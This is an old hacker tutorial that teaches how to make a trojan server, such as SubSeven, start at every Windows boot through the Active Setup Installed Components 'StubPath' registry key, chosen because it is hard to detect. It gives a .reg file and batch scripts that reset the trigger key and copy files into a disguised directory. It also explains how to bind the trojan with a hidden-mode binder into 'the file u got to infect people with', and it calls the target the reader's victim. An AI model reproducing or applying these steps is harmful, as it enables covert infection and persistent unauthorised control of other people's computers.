activex startup method used in subseven 2.2


This is a tutorial explaining the activex startup method used in
subseven 2.2 and how to implement it for any program to run at
startup.Thanks.

 headputty
--------------------------------------------------------------------------------

                                  THIS IS A TUTORIAL ON THE   
HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components STARTUP 
METHOD

The active x installed components key can be used to run programs at 
windows startup.You would prefer this to other methods like 
win.ini,system.ini or the run services key to startup programs
as it's harder to detect.(i mean trojans and other progs)
                         Even if your victim is not to knowledgeable on 
this matter,he just has to use msconfig.exe(in win98) or other 
softwares that show registry entries in the run services key and your entry(i 
mean the entry that your trojan file adds) to this key can be removed 
easily.
                          I think this method was first used in 
subseven 2.2,it's my favourite.If for some reason you want to use a trojan 
server that does not support this metod ,read on.

Info on this method-
A key has to be created in HKEY_LOCAL_MACHINE\Software\Microsoft\Active 
Setup\Installed Components\key-----(key stands for any keyname of your 
choice. (iron maiden,i will use this as an example) .so I would have to 
create this path-
HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed 
Components\ironmaiden
the name of the key should be "stubpath" and the value should be the 
path of your file.

example-

HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed 
Components\ironmaiden]
"StubPath"="c:\rev.exe"
(i will come back to this a little later)

You can try this on your pc with some friendly program ,so that u know 
what's goin on.
click on start
run
regedit
go to HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed 
Components
create a new key
HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed 
Components\ironmaiden
add a new string value
rename the name to stubpath and put the value as the path of your 
program
ex "name -StubPath  value-c:\rev.exe
restart your pc

you'l find your program run at startup.Now go to 
HKEY_current_user\software\Microsoft\Active Setup\Installed Components ,you'l find a new key 
created with the keyname u chose(here ironmaiden).this key is created 
everytime a new key is created in 
HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components  Now delete this key and restart your 
pc.You'l find your program running again.
                                         So you would have figured out 
that your program starts up as long as the entry in 
HKEY_current_user\oftware\Microsoft\Active Setup\Installed Components
is not present.The trick here is to delete this key everytime your 
program runs ,so that it runs on next startup.I think in subseven 2.2, the 
server renames the key in hklm each time.(corect me if iam wrong here).
                   
Now here's what u need-
1)a file binder(sennaspy one exe maker(kicks ass,has a lot of options 
like copy to some dir,can hide execution) 
http://www.megasecurity.org/Binders/Files/Ssoem2.0a.zip)
2)a command line registry manipulation tool(dtreg.exe is what i use, 
download it from http://www.tamedos.com/downloads)
3)your trojan file

1st step
choose a directory where you want your file to run from.i will suggest 
c:\windows\system\directx as an example(u should change it to something 
else).This is just to make the file harder to detect.

2nd step
use a binder like sennaspy or juntador to bind your server file to a 
bat file.
to create the bat file 
open notepad
copy the following lines
//
cd system
cd directx
dtreg -deletekey "\hkcu\software\microsoft\active setup\installed 
components\ironmaiden" 
//(without //)
save the file as something.bat

bind your file with something.bat file(in the same order,so that ur 
file is executed before something.bat).supress the output screen of 
something.bat by using the hide mode in sennaspy one exe maker.
this is your modified server that will startup each time.reName it as 
dxsetup.exe or something.
                           
3rd step
open notepad 
copy these lines
//

REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed 
Components\ironmaiden]
"StubPath"="c:\\windows\\system\\directx\\dxsetup.exe"

//(don't include //)
save it as dd.reg

create this bat file
//
cd temp
copy dxsetup.exe c:\windows\system\directx
copy dtreg.exe c:\windows\system\directx
regedit /s dd.reg
deltree /y *.*
//
save it as a bat file

now use your binder to bind the trojan file u created in step 
2,dtreg.exe,the reg file dd.reg and the bat file u created above(in order 
given).set the files extract to c:\windows\temp.disable running of these 
programs.u just have to copy then to c:\windows\temp.the bound file is the 
file u got to infect people with.

iam sure there are other ways of doing this.please inform me if u know 
some better way.
this is my first tutorial.Send me your suggestions at 
[email protected]

HeAdpUtTy